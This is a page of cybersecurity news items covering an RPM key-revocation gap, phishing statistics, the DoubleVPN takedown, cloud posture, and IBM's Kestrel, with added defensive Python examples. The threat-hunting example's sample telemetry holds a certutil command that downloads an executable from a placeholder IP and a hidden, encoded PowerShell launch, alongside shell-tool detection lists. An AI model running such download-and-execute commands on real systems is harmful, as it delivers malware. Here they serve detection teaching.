More stories

  • Major Linux RPM problem uncovered

    In 1995, when Linux 1.x was the hot new Linux kernel, early Red Hat founding programmers Marc Ewing and Erik Troan created RPM. This software package management system became the default way to distribute software for Red Hat Linux-based distributions such as Red Hat Enterprise Linux (RHEL), CentOS Stream, AlmaLinux OS, and Rocky Linux. Unfortunately, hidden within its heart is a major security hole. 

    Dmitry Antipov, a Linux developer at CloudLinux, AlmaLinux OS’s parent company, first spotted the problem in March 2021. Antipov found that RPM would accept unauthorized RPM packages: unsigned packages, or packages signed with revoked keys, could silently be installed or updated without a word of warning that they might not be legitimate. Why? Because RPM had never implemented revocation checking for signing keys. Specifically, as Linux and lead RPM developer Panu Matilainen explained: “Revocation is one of the many unimplemented things in rpm’s OpenPGP support. In other words, you’re not seeing a bug as such; it’s just not implemented at all, much like expiration is not.”

    How could this be? It’s because RPM dates back to the days when getting code to work was the first priority and security came a long way second. For example, we don’t know whether the first RPM commit was made by Marc Ewing or Erik Troan, because it was done as root. Those were the days! Things have changed, and security is now a much higher priority.

    Antipov, wearing his hat as a TuxCare (CloudLinux’s KernelCare and Extended Lifecycle Support) team member, has submitted a patch to fix the problem. As Antipov explained in an interview: “The problem is that both RPM and DNF [a popular software package manager that installs, updates, and removes packages on RPM-based Linux distributions] do a check to see if the key is valid and genuine but not expired, but not for revocation. As I understand it, all the distribution vendors have just been lucky enough to never have been hit by this.” They have indeed been lucky. Armed with a compromised signing key that the vendor has since revoked, an attacker could still sign packages that RPM would accept, making it child’s play to sneak malware onto a Linux desktop or server.

    Joao Correia, a TuxCare Technical Evangelist, asked: “Do you know how long it takes for the distros to pick up the changes that are submitted to the code repositories?” Antipov replied:

    “That’s hard to know. In general, the problem is that crypto is hard. It takes a special background, some special experience, and so on. Package management projects are doing package management, not crypto, so they don’t want, and don’t need to, develop their own crypto libraries to include RPM and DNF. I’m not an expert in the crypto field to be able to fix current DNF and RPM issues. I’ve used the RNP library, a well-known library in the open-source world, already used in Mozilla Thunderbird, for example, but the library itself is not a part of Red Hat or any other RPM-based Linux distribution. So to take my fix as is, for the moment, they need to add it to the library first. This is not so quick, so it’s hard to say how long it will take.”

    He fears, though, that it may be months before the fix is released. At the moment, the security hole is still alive, well, and open to attack. Antipov and his team are considering filing a Common Vulnerabilities and Exposures (CVE) entry for the issue since, in the end, it’s clearly a security issue. If I may be so bold: file a CVE with Red Hat. This needs fixing, and it needs fixing now. In the meantime, administrators of RPM-based systems will need to take a closer look at the packages they install and verify for themselves that the key that signed each one is still valid.
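    One concrete interim check, as an added example that is not the article’s, RPM’s, DNF’s or TuxCare’s own code: cross-reference the key ID that signed each package (taken from rpm’s query-format output) against the revocation flag in the administrator’s own gpg keyring, which gpg does track even though, per the article, rpm ignores it. dnf’s gpgcheck=1 rejects packages that are unsigned or signed by a key you never imported, but not packages signed by an imported key that has since been revoked; that is the gap this script covers. It runs offline on constructed sample output of the two commands named in the docstring; the package names, key IDs, fingerprints and dates are hypothetical.

```python
r"""Cross-check the key that signed each RPM against gpg's revocation flag.

Added example, not part of the article and not RPM, DNF or TuxCare code.
It parses the output of two real commands,

    rpm -qp --qf '%{SIGPGP:pgpsig}\n' <package>.rpm
    gpg --with-colons --list-keys

but, so that it runs offline, works on constructed sample output embedded
below. Package names, key IDs, fingerprints and dates are hypothetical.
"""
import re
import subprocess
from typing import Dict, Optional

# Constructed sample: one %{SIGPGP:pgpsig} line per package (key IDs made up).
# A header-only signed package reports its key under RSAHEADER instead, so
# query both tags on real systems.
SAMPLE_RPM_SIGS = {
    "kernel-5.10.0-1.el8.x86_64.rpm":
        "RSA/SHA256, Mon 01 Mar 2021 09:12:33 AM UTC, Key ID 15af5dac6d745a60",
    "openssl-1.1.1k-1.el8.x86_64.rpm":
        "RSA/SHA256, Tue 02 Mar 2021 11:02:10 AM UTC, Key ID 0608b895e2f7c1d2",
    "vim-8.2.0-1.el8.x86_64.rpm": "(none)",
}

# Constructed sample of `gpg --with-colons --list-keys` for the vendor keys the
# admin has imported. Field 2 of a pub:/sub: record is gpg's validity flag:
# 'r' = revoked, 'e' = expired, 'f'/'u' = valid and trusted, '-' = unknown.
SAMPLE_GPG_KEYS = """\
tru::1:1625000000:0:3:1:5
pub:f:4096:1:15AF5DAC6D745A60:1609459200:::-:::scESC::::::23::0:
fpr:::::::::0123456789ABCDEF0123456715AF5DAC6D745A60:
uid:f::::1609459200::0000000000000000000000000000000000000001::Example Vendor (2021 signing key) <security@vendor.example>::::::::::0:
pub:r:4096:1:0608B895E2F7C1D2:1500000000:::-:::sc::::::23::0:
fpr:::::::::FEDCBA9876543210FEDCBA980608B895E2F7C1D2:
uid:r::::1500000000::0000000000000000000000000000000000000002::Example Vendor (2017 signing key) <security@vendor.example>::::::::::0:
"""

KEYID_RE = re.compile(r"Key ID ([0-9a-fA-F]{16})")


def parse_rpm_sig(sig_line: str) -> Optional[str]:
    """Return the 64-bit signer key ID (lowercase hex), or None if unsigned."""
    m = KEYID_RE.search(sig_line)
    return m.group(1).lower() if m else None


def parse_gpg_colons(colon_output: str) -> Dict[str, str]:
    """Map each key ID (lowercase hex) from pub:/sub: records to its validity flag."""
    flags: Dict[str, str] = {}
    for line in colon_output.splitlines():
        fields = line.split(":")
        if fields[0] in ("pub", "sub") and len(fields) > 4:
            flags[fields[4].lower()] = fields[1]
    return flags


def classify(pkg_sigs: Dict[str, str], key_flags: Dict[str, str]) -> Dict[str, str]:
    """Verdict per package: ok, unsigned, unknown-key, revoked, expired or unvalidated."""
    verdicts: Dict[str, str] = {}
    for pkg, sig in pkg_sigs.items():
        kid = parse_rpm_sig(sig)
        if kid is None:
            verdicts[pkg] = "unsigned"
        elif kid not in key_flags:
            verdicts[pkg] = "unknown-key"   # signed by a key you never imported
        elif key_flags[kid] == "r":
            verdicts[pkg] = "revoked"       # the case rpm/dnf do not catch
        elif key_flags[kid] == "e":
            verdicts[pkg] = "expired"
        elif key_flags[kid] in ("f", "u"):
            verdicts[pkg] = "ok"
        else:
            verdicts[pkg] = "unvalidated"   # key present but not trust-validated
    return verdicts


def live_rpm_sigs(paths):
    """Collect real %{SIGPGP:pgpsig} values; only for actual .rpm files on disk."""
    out = {}
    for p in paths:
        res = subprocess.run(["rpm", "-qp", "--qf", "%{SIGPGP:pgpsig}\n", p],
                             capture_output=True, text=True, check=True)
        out[p] = res.stdout.strip()
    return out


if __name__ == "__main__":
    for pkg, verdict in classify(SAMPLE_RPM_SIGS, parse_gpg_colons(SAMPLE_GPG_KEYS)).items():
        print(f"{verdict:12s} {pkg}")
```

    On a real host, replace SAMPLE_RPM_SIGS with live_rpm_sigs() over the downloaded packages and SAMPLE_GPG_KEYS with the output of gpg --with-colons --list-keys run against the keyring where the vendor keys were imported; anything other than "ok" deserves a look before the package is installed.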

  • IT, healthcare and manufacturing facing most phishing attacks: report

    A new report from cybersecurity firm Avanan found that its customers in the IT, healthcare and manufacturing industries were facing the highest number of phishing emails. The company’s researchers examined more than 905 million emails for the 1H 2021 Global Phish Cyber Attack Report, finding that the IT industry specifically saw 9,000 phishing emails in a one-month span out of almost 400,000 total emails. Its healthcare industry customers saw more than 6,000 phishing emails in one month out of an average of over 450,000 emails, and manufacturing saw a bit less than 6,000 phishing emails out of about 330,000 total emails.


    Avanan researchers said these industries are ripe targets because of the massive amount of personal data they collect and because they are often stocked with outdated technology that can be easily attacked. Gil Friedrich, CEO of Avanan, said the report highlighted the perilous situation facing thousands of hospitals around the world. “The Avanan research shows that hackers are using one of the most basic tactics to get in: phishing attacks,” Friedrich said. About 5% of all emails are phishing, according to the report, and many hackers are now targeting “low-hanging fruit” rather than C-level executive accounts. Most phishing attacks involve either impersonation or credential harvesting, the researchers found. More than half of all phishing attacks involve credential harvesting, a figure that has grown by almost 15% since 2019. About 20% of all phishing attacks are related to Business Email Compromise.

    Non-executive accounts are targeted 77% more than other accounts, the report said, and nearly 52% of all impersonation emails pretend to be from a non-executive account at an enterprise. “There are a few reasons behind this. One, security admins might be spending a lot of time providing extra attention to the C-Suite and hackers have adjusted. Two, non-executives still hold sensitive information and have access to financial data. There is no need to go all the way up the food chain,” Avanan researchers said.

    Avanan works as a second layer of defense behind Microsoft’s EOP, ATP/Defender, Google Workspace and other tools. The report said more than 8% of all phishing emails managed to get past the first layers of defense and into people’s inboxes “because of an allow or block list misconfiguration, a 5% increase from last year, and 15.4% of email attacks are on an Allow List.” “The most commonly used tactic is using non-standard characters and limited sender reputation. Non-standard characters are used in 50.6% of phishing links and 84.3% of phishing emails do not have a significant historical reputation with the victim,” the report said.

    Avanan researchers also noted that the Junk Email folder in many inboxes has become a haven for phishing emails, confusing users who look through their Junk folders for marketing emails and subscriptions. The report said messages with Microsoft Spam Confidence Level (SCL) scores of 5, 6 and 9 are delivered to a Microsoft user’s Junk folder, leaving them alongside legitimate emails offering deals and other things. “You now have monthly subscriptions, newsletters, and targeted phishing attacks in your spam folder, and you have to leave it up to the end-user to decide which ones are safe to open,” one unnamed CIO told Avanan researchers. The same happens for Google users, but Microsoft users see 89% more emails in Junk than Google users do, according to the report.

    “An easy way to determine if an email is suspicious is by looking at sender reputation. It’s no wonder, then, that 84.3% of all phishing emails do not have a significant historical reputation with the victim. Further, 43.35% of all phishing emails come from domains with very low traffic,” the report said.

  • This VPN service used by ransomware gangs was just taken down by police

    An underground virtual private network (VPN) service used by cyber criminals to hide their activities while conducting ransomware attacks, phishing campaigns and other malicious hacking operations has been taken down in a major international law enforcement operation. DoubleVPN offered users the ability to mask their locations and identities, allowing cyber criminals to carry out activities anonymously, according to police.


    Now its servers and web domains have been seized in a coordinated law enforcement takedown led by the Dutch National Police (Politie) and involving agencies including Europol’s European Cybercrime Centre (EC3), Eurojust, the FBI, and the UK National Crime Agency.

    DoubleVPN was heavily advertised across Russian- and English-speaking dark web cybercrime forums as a means for criminals, including ransomware gangs and phishing operations, to hide their activities, according to Europol. The cheapest VPN connection on offer cost just $25, while more expensive tiers offered what were described as double, triple and even quadruple VPN connections to criminal clients. Servers hosting DoubleVPN around the world have been seized, and web domains relating to the service have been replaced with a takedown notice reading: “On 29th of June 2021, law enforcement took down DoubleVPN. Law enforcement gained access to the servers of DoubleVPN and seized personal information, logs and statistics kept by DoubleVPN about all of its customers. Double VPN’s owners failed to provide the services they promised.”

    Dutch public prosecutor Wieteke Koorn said: “This criminal investigation concerns perpetrators who think they can remain anonymous, while facilitating large-scale cybercrime operations.

    “By taking legal action, including the special investigatory power for digital intrusion, we want to make it very clear there cannot be any safe havens for these kind of criminals. Their criminal acts damage the digitalised society and erode the trust of citizens and companies in digital technologies, therefore their behaviour has to be stopped,” she added.

    The joint operation involved more than 30 coordination meetings and four workshops to prepare for the final stage of the takedown, which was coordinated on the day through a virtual command post set up by Europol.

    “Law enforcement is most effective when working together and today’s announcement sends a strong message to the criminals using such services: the golden age of criminal VPNs is over. Together with our international partners, we are committed to getting this message across loud and clear,” said Edvardas Šileris, head of Europol’s EC3. Law enforcement agencies from Germany, Canada, Sweden, Italy, Bulgaria and Switzerland also participated in the takedown, which was carried out within the framework of the European Multidisciplinary Platform Against Criminal Threats (EMPACT).


  • Singapore startup touts need to mitigate risks, automate cloud security

    Every business, large or small, is a target of cybercriminals and should look at minimising security risks, not simply preventing them. This is essential as more businesses move to the cloud, and organisations in Asia largely still lack urgency in addressing security. Unlike their peers in the US, where enterprises across most sectors treat security as part of their business process, Asia-Pacific companies had yet to do so, said Paul Hadjy, CEO and co-founder of Horangi. The Singapore-based security startup’s flagship product, Warden, is a cloud security posture management (CSPM) tool touted to safeguard against misconfigurations and compliance breaches. Asia-Pacific organisations, likely distracted by keeping the business running and day-to-day management, generally did not regard security as top of their agenda, Hadjy noted, whereas in the US it was commonly discussed at every meeting in the boardroom and amongst C-level executives.

    This was changing, though, he said, adding that the focus on security would intensify as more regulations were introduced around the use of cloud and businesses became concerned about staying in compliance. And they would have reasons to be anxious. By 2023, at least 99% of cloud security failures were projected to be the customer’s fault, according to Gartner. The research firm also predicted that half of enterprises this year would unknowingly and erroneously expose some cloud services or applications to the public internet, including storage, APIs (application programming interfaces), and network segments. Hadjy noted that most customers Horangi worked with had no prior cloud security framework in place. “If you’re not using a cloud security platform, you’re going to have issues because you don’t have visibility across the cloud architecture,” he said. “You can use tools to do so manually, but you’ll need to repeatedly follow [the steps] to do so when you use different cloud platforms.” He stressed the need for proper security processes, such as patch management, to be in place to address any potential misconfigurations.

    He warned that no business today was too small to be a target and all were at risk of cybersecurity attacks. Hackers also would target organisations that did not take security seriously. Technology, too, was no different from any other part of the business, with opportunities for mistakes to be made, he said, especially if no automation was involved. IT environments also could become challenging to manage over time, with organisations having to manage systems and software that were more than a decade old alongside modern applications running on cloud. Hadjy added that the move to remote work further complicated IT infrastructures, where traditional methods of ring-fencing corporate networks were no longer effective as more employees worked from home. Noting that no security solution was perfect, he stressed the need for organisations to focus on mitigating risks and on their ability to react quickly to reduce the damage should they suffer a security breach. Founded in 2016, Horangi last month was added to Amazon Web Services’ (AWS) ISV Accelerate programme, having obtained the cloud vendor’s security competency status. The Singapore startup last year secured $20 million in Series B funding, adding to its Series A $3.1 million haul, and might embark on another fund-raising initiative this or next year, Hadjy told ZDNet. Horangi’s Warden is pitched as a multi-cloud security platform designed to automatically safeguard against misconfigurations and compliance violations. It identifies “critical cloud resource configurations that may become entry points for attackers”, according to the startup.
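    To make the kind of misconfiguration a posture tool looks for concrete, here is an added example (not Horangi’s or Warden’s code) of the checks such a tool automates: it walks a constructed inventory shaped like the output of the AWS describe-security-groups, get-public-access-block and get-bucket-acl calls, flags administrative ports open to the whole internet and storage buckets readable by everyone, and ranks the findings by severity. The field names follow the AWS API; the resource IDs, bucket names and CIDRs are made up.

```python
"""Cloud posture checks of the kind a CSPM product automates.

Added example, not Horangi's or Warden's code. It runs two
misconfiguration checks (world-reachable admin ports, publicly readable
storage) over a constructed snapshot whose field names follow the AWS
EC2/S3 APIs; the resource IDs, names and CIDRs are hypothetical.
"""
from typing import Dict, List

# Constructed inventory, as an admin might dump it from describe-security-groups,
# get-public-access-block and get-bucket-acl.
SNAPSHOT = {
    "SecurityGroups": [
        {"GroupId": "sg-0a1b2c3d", "IpPermissions": [
            {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
             "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
        ]},
        {"GroupId": "sg-0e5f6a7b", "IpPermissions": [
            {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
             "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},            # fine: a web port
            {"IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389,
             "IpRanges": [{"CidrIp": "10.0.0.0/8"}]},           # fine: internal only
        ]},
        {"GroupId": "sg-0f9e8d7c", "IpPermissions": [
            {"IpProtocol": "-1", "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},  # everything open
        ]},
    ],
    "Buckets": [
        {"Name": "corp-backups",
         "PublicAccessBlock": {"BlockPublicAcls": False, "IgnorePublicAcls": False,
                               "BlockPublicPolicy": False, "RestrictPublicBuckets": False},
         "Grants": [{"Grantee": {"Type": "Group",
                                 "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
                     "Permission": "READ"}]},
        {"Name": "www-assets",
         "PublicAccessBlock": {"BlockPublicAcls": True, "IgnorePublicAcls": True,
                               "BlockPublicPolicy": True, "RestrictPublicBuckets": True},
         "Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "0123abcd"},
                     "Permission": "FULL_CONTROL"}]},
    ],
}

ADMIN_PORTS = {22: "ssh", 3389: "rdp", 3306: "mysql", 5432: "postgres",
               6379: "redis", 27017: "mongodb"}
PUBLIC_GRANTEES = {"http://acs.amazonaws.com/groups/global/AllUsers",
                   "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}


def _world_reachable(perm: dict) -> bool:
    """True if the rule's source covers every IPv4 or every IPv6 address."""
    v4 = any(r.get("CidrIp") == "0.0.0.0/0" for r in perm.get("IpRanges", []))
    v6 = any(r.get("CidrIpv6") == "::/0" for r in perm.get("Ipv6Ranges", []))
    return v4 or v6


def check_open_admin_ports(groups: List[dict]) -> List[Dict[str, str]]:
    """Flag ingress rules that expose admin or database ports to the internet."""
    findings = []
    for sg in groups:
        for perm in sg.get("IpPermissions", []):
            if not _world_reachable(perm):
                continue
            if perm.get("IpProtocol") == "-1":          # all protocols, all ports
                findings.append({"resource": sg["GroupId"], "severity": "critical",
                                 "issue": "all traffic open to the internet"})
                continue
            lo, hi = perm.get("FromPort", 0), perm.get("ToPort", 65535)
            for port, svc in ADMIN_PORTS.items():
                if lo <= port <= hi:
                    findings.append({"resource": sg["GroupId"], "severity": "high",
                                     "issue": f"{svc} (tcp/{port}) open to the internet"})
    return findings


def check_public_buckets(buckets: List[dict]) -> List[Dict[str, str]]:
    """Flag buckets whose ACL grants everyone access and whose public-access
    block does not neutralise that grant, plus any block that is not fully on."""
    findings = []
    for b in buckets:
        pab = b.get("PublicAccessBlock", {})
        acl_public = any(g.get("Grantee", {}).get("URI") in PUBLIC_GRANTEES
                         for g in b.get("Grants", []))
        # With IgnorePublicAcls on, S3 disregards public ACL grants, so a
        # public grant is only exploitable when that setting is off.
        if acl_public and not pab.get("IgnorePublicAcls", False):
            findings.append({"resource": b["Name"], "severity": "critical",
                             "issue": "bucket ACL grants public access"})
        if not all(pab.get(k, False) for k in ("BlockPublicAcls", "IgnorePublicAcls",
                                                "BlockPublicPolicy", "RestrictPublicBuckets")):
            findings.append({"resource": b["Name"], "severity": "medium",
                             "issue": "public access block not fully enabled"})
    return findings


def run_posture_checks(snapshot: dict) -> List[Dict[str, str]]:
    """Run every check and return the findings, most severe first."""
    order = {"critical": 0, "high": 1, "medium": 2}
    findings = (check_open_admin_ports(snapshot.get("SecurityGroups", []))
                + check_public_buckets(snapshot.get("Buckets", [])))
    return sorted(findings, key=lambda f: order[f["severity"]])


if __name__ == "__main__":
    for f in run_posture_checks(SNAPSHOT):
        print(f"[{f['severity']:8s}] {f['resource']}: {f['issue']}")
```

    The checks are deliberately rule-based: each one encodes a single question an auditor would ask, which is what makes them cheap to run on every change and portable across accounts.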

  • JFrog acquires Vdoo to provide security from development to device

    DevOps platform maker JFrog, the first company to develop a binary code management repository for developers, said on June 29 that it is acquiring Tel Aviv-based Vdoo in a cash- and stock-based deal valued at about $300 million. Vdoo makes an integrated security platform for connected, IoT, and embedded devices.


    JFrog founder and CEO Shlomi Ben Haim told ZDNet that adding Vdoo’s intellectual property was important to his company’s efforts to develop a next-generation security offering for DevOps users as they respond to a disruption in the market for continuous software delivery. Both companies focus on protecting binary code in enterprise IT systems, a central target for hackers, Ben Haim said. Sunnyvale, Calif.-based JFrog is expanding its end-to-end DevOps platform, which it says provides security ranging from the development environment all the way to edge systems, IoT, and other devices. DevOps is a set of practices that combines software development and IT operations, with the aim of shortening the development life cycle and providing continuous delivery with high software quality. Affiliated with DevOps is a relatively new segment called “liquid software,” which describes the flow of software packages from the moment they are created all the way to deployment. Whereas software companies years ago used to publish one or two updates per year, they now often produce updates and patches whenever they are needed, sometimes multiple times per day. Because of these developments, namely all this new software filling the internet traffic lanes every second, new security processes are required, Ben Haim said.

    Most current DevOps and liquid software solutions lack security capabilities that are fully integrated into the software lifecycle, Ben Haim said. These security tools are point products with their own data sets, which create friction between development and security teams and slow the release of software updates. This problem is especially acute when updates are continuously delivered to the edge or across a large fleet of devices. As a result, many of these security tools are not delivering on the promise of fast, automated, and secure releases, Ben Haim said. “The main motivation behind this is that we want to provide the world with a real DevSecOps solution, all the way from the DevOps pipeline, to the edge, to whatever destination,” Ben Haim said. “What we built during the past four years is technology, and better software security, around focusing on binary. We identify binary as the highest priority.”

    Vdoo’s product security platform automates software security tasks throughout the entire product lifecycle, ensuring that all findings are prioritized, communicated, and mitigated. The company’s security experts and vulnerability researchers will join the JFrog team to develop advanced security solutions for developers and security engineers, CEO and co-founder Nati Davidi told ZDNet. JFrog said it will expand its JFrog Xray vulnerability detection product to include Vdoo’s data and improved scanning across multiple dimensions, including configuration and applicability scanning, by the end of this year. In addition, JFrog expects to fully integrate Vdoo’s technology into its DevOps platform to provide an all-in-one secured platform in 2022, Ben Haim said.

  • Google outlines new security practices for Nest devices

    Google is outlining new security standards for its Nest smart home devices and updating its privacy commitments as part of an effort to make its positions on both privacy and security more straightforward for Nest users. 

    Google said its new Nest security practices include adopting standards Google has long held as well as implementing new updates that are specific to Nest’s connected home devices and services. Specifically, Google will begin certifying Nest devices sold in 2019 or later against independent security standards, including those developed by the Internet of Secure Things Alliance (ioXt). The company will also publish the validation results that explain how its products hold up to those standards, and will assess new products against the standards prior to launch. Meanwhile, Google said Nest will now participate in the Google vulnerability rewards program, which pays outside security researchers for finding vulnerabilities and reporting them to the Nest Security team. Google has also committed to patching critical issues known to Google Nest, promising automatic bug and security fix support for a minimum of 5 years. Nest devices will also be added to the Google device activity page to give users visibility into which devices are connected to their account. It’s worth noting that Nest users have already had access to these security protections, provided they linked their devices to an active Google account. In terms of privacy, Google said it has updated a section in its privacy commitments to better reflect its focus on openness. Nest product manager Ryan Campbell said in a blog post:

    “Two years ago Nest shared our commitments to privacy to give you a better understanding of how our products work in your home. Today, we’re publishing new security commitments and putting it all in one place: Nest’s new Safety Center. The Safety Center is meant to give you a clear picture of the work we do each day to build trustworthy products and create a safer and more helpful home. Finally, we want to acknowledge the way this technology is evolving (for example, our recent announcements on Matter and our work on Project Connected Home over IP). That’s why we’ve updated a small section in our privacy commitments to better reflect our focus on openness.”

    Google’s latest security updates to the Nest product family build on earlier changes Google made to bolster the security posture of its products. In February 2020, Google rolled out two-factor authentication (2FA) to Nest accounts, and before that it integrated reCAPTCHA Enterprise with Nest accounts to mitigate the risk of credential stuffing attacks.

  • Survey finds massive gap in awareness of cyberattacks

    A new survey from cybersecurity company Armis found that awareness of major cybersecurity incidents in the US is lacking. Last month, the company surveyed more than 2,000 professionals, finding that almost 25% had never heard about the ransomware attack on Colonial Pipeline that caused fuel shortages along the East Coast. More than 23% said the attack would not have any lasting effect on the fuel industry in the US, despite the highly publicized cybersecurity changes oil and gas companies were required to make by the Biden Administration following the attack. Nearly half of respondents had not heard about the malicious takeover of the water treatment plant in Oldsmar, Florida. More than half of all respondents said their devices did not pose a cybersecurity risk when it came to personal cybersecurity. Over 70% said they expected to bring their devices from home into the office once COVID-19 restrictions were lifted. Curtis Simpson, CISO at Armis, said the responses showed that organizations have to prioritize cybersecurity on their own because employees have little awareness of the cyber threat landscape. “The attacks on our critical infrastructure are clear evidence of the need for cybersecurity and assurance to all our utility providers and players. Organizations must be able to know what they have, track behavior, identify threats, and immediately take action to protect the safety and security of their operation,” Simpson said.

    “This data shows that there is less consumer attention on these attacks as we might expect, and so that responsibility falls to businesses to shore up their defenses.”

    A bipartisan group of US House of Representatives members introduced the American Cybersecurity Literacy Act last week in an effort to improve the country’s understanding of cybersecurity and kickstart public awareness campaigns. Rep. Adam Kinzinger, one of the leading voices behind the bill, noted on Twitter that a cyberattack occurs every 39 seconds and that since the pandemic started, cybercrime has increased drastically. “We must protect ourselves and our interests — and it starts with cyber education. As technological advancements increase and become more complex, it is critical that everyone is aware of the risks posed by cyberattacks and how to mitigate those risks for personal security,” Kinzinger said. “In order to prevent these attacks going forward, we must combine public awareness with targeted cyber education.” Rep. Gus Bilirakis, the Congressman for Oldsmar, Florida, added that the bill would help “develop a national education campaign to raise awareness of attacks and the practical steps that can be taken to thwart future bad actors.” “In my district, a hacker was recently able to penetrate a local government’s security measures and temporarily change the chemical settings of the city’s water supply to a potentially dangerous level,” Bilirakis said. “This is a matter of national security, and we must do everything we can to protect all Americans from those who wish to do us harm.”


  • IBM Kestrel threat hunting language granted to Open Cybersecurity Alliance

    IBM has contributed the Kestrel threat analysis language to the Open Cybersecurity Alliance (OCA). 

    On Tuesday, the tech giant said that Kestrel helps Security Operations Center (SOC) analysts and other professionals in the industry “streamline threat discovery,” allowing experts to more quickly tackle cyberforensics investigations, breaches, and other incidents. Kestrel made its debut this year at the RSA Conference. The open source language, developed jointly by IBM Research and IBM Security, grew out of experiments performed under DARPA’s Transparent Computing program. Kestrel is used to compose “hunt” flows: known patterns, data sources, analytics, and detection logic are expressed as reusable steps, so that repetitive work is left to automation while cybersecurity professionals focus on the tasks that require human intuition and skill. Normally, proactive threat hunting to protect an organization’s networks takes many human hours and considerable skill, and because it requires hypotheses and likely attack sources to be formulated alongside detection procedures, the vendor believes that cybersecurity staff often end up “rewriting the same programs following each attack.” This is where Kestrel comes in.
    “Kestrel threat hunting language provides an abstraction for threat hunters to focus on what to hunt instead of how to hunt,” IBM says. “The composable hunting flows enable the reuse of best practices and help reduce the time to create new hunts.”
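    As an added example (not Kestrel’s own syntax and not IBM’s code), the following Python sketch shows the pattern the passage describes: hunt steps written once (get entities, follow the created-by relation, filter with an analytic) and composed into flows that can be reused and combined, so that a new hunt is assembled from existing steps rather than rewritten. The process records are a constructed sample loosely shaped like EDR telemetry; the hosts, PIDs, command lines and the encoded-command heuristic are hypothetical.

```python
"""Composable hunt steps over process telemetry.

Added example, not Kestrel syntax and not IBM code. It mirrors in plain
Python the idea the article describes: hunt steps (get entities, follow a
relation, filter) written once and composed into reusable flows. The
records below are a constructed sample; hosts, PIDs and command lines
are hypothetical.
"""
from dataclasses import dataclass
from typing import Callable, List


@dataclass(frozen=True)
class Process:
    host: str
    pid: int
    ppid: int
    name: str
    cmdline: str


# Constructed telemetry: a document macro spawning encoded PowerShell on ws01,
# a legitimate scheduled PowerShell script on ws02, and Outlook spawning cmd
# that pulls a file with certutil on ws03.
EVENTS = [
    Process("ws01", 100, 1, "explorer.exe", "explorer.exe"),
    Process("ws01", 220, 100, "winword.exe", "winword.exe /n invoice.docm"),
    Process("ws01", 231, 220, "powershell.exe", "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo"),
    Process("ws02", 300, 1, "services.exe", "services.exe"),
    Process("ws02", 310, 300, "powershell.exe", "powershell.exe -File C:\\ops\\patch.ps1"),
    Process("ws03", 400, 100, "outlook.exe", "outlook.exe"),
    Process("ws03", 410, 400, "cmd.exe", "cmd.exe /c certutil -urlcache -f http://203.0.113.7/a.exe a.exe"),
]

# A step maps (all telemetry, current hunt variable) -> new hunt variable.
Step = Callable[[List[Process], List[Process]], List[Process]]


def get(pred: Callable[[Process], bool]) -> Step:
    """GET-like step: start a new hunt variable from the full telemetry."""
    return lambda allp, _cur: [p for p in allp if pred(p)]


def find_children() -> Step:
    """FIND-like step: processes created by anything in the current variable."""
    def step(allp: List[Process], cur: List[Process]) -> List[Process]:
        parents = {(p.host, p.pid) for p in cur}
        return [p for p in allp if (p.host, p.ppid) in parents]
    return step


def where(pred: Callable[[Process], bool]) -> Step:
    """Analytic step: keep only entities of the current variable matching pred."""
    return lambda _allp, cur: [p for p in cur if pred(p)]


def run_flow(steps: List[Step], allp: List[Process]) -> List[Process]:
    """Execute the steps in order, threading the hunt variable through them."""
    cur: List[Process] = []
    for step in steps:
        cur = step(allp, cur)
    return cur


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_FLAGS = {"-e", "-enc", "-encodedcommand"}   # hypothetical heuristic

# Steps defined once and shared by every hunt below.
office_apps = get(lambda p: p.name.lower() in OFFICE)
powershell = get(lambda p: p.name.lower() == "powershell.exe")
is_shell = where(lambda p: p.name.lower() in SHELLS)
has_encoded_cmd = where(lambda p: p.name.lower() == "powershell.exe"
                        and any(t.lower() in ENCODED_FLAGS for t in p.cmdline.split()))


def hunt_office_spawned_shells(allp: List[Process]) -> List[Process]:
    """Shells whose direct parent is an Office application."""
    return run_flow([office_apps, find_children(), is_shell], allp)


def hunt_encoded_powershell(allp: List[Process]) -> List[Process]:
    """PowerShell started with a base64-encoded command."""
    return run_flow([powershell, has_encoded_cmd], allp)


def hunt_office_to_encoded_powershell(allp: List[Process]) -> List[Process]:
    """The two hunts composed: Office -> child shell -> encoded command."""
    return run_flow([office_apps, find_children(), is_shell, has_encoded_cmd], allp)


if __name__ == "__main__":
    for name, hunt in [("office->shell", hunt_office_spawned_shells),
                       ("encoded ps", hunt_encoded_powershell),
                       ("composed", hunt_office_to_encoded_powershell)]:
        print(name, [(p.host, p.pid, p.name) for p in hunt(EVENTS)])
```

    The point is the reuse: the third hunt is the first two glued together, and the legitimate scheduled script on ws02 survives all of them because no step matches it, so the analyst only ever looks at the ws01 and ws03 results.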

    The project is open source and has now been accepted by the OCA, whose members include Cybereason, McAfee, IBM Security, and Tenable; it is hoped that the language will further the alliance’s promotion of interoperable cybersecurity products. “Instead of dissecting indicators of compromise we will be dissecting playbooks of entire hunt logic and across data sources,” commented Sheldon Shaw, VP of Innovation & Infrastructure at CyberNB. “As adoption of the language continues to roll out, our collective hunt teams will be able to collaborate and approach cyber investigations differently.”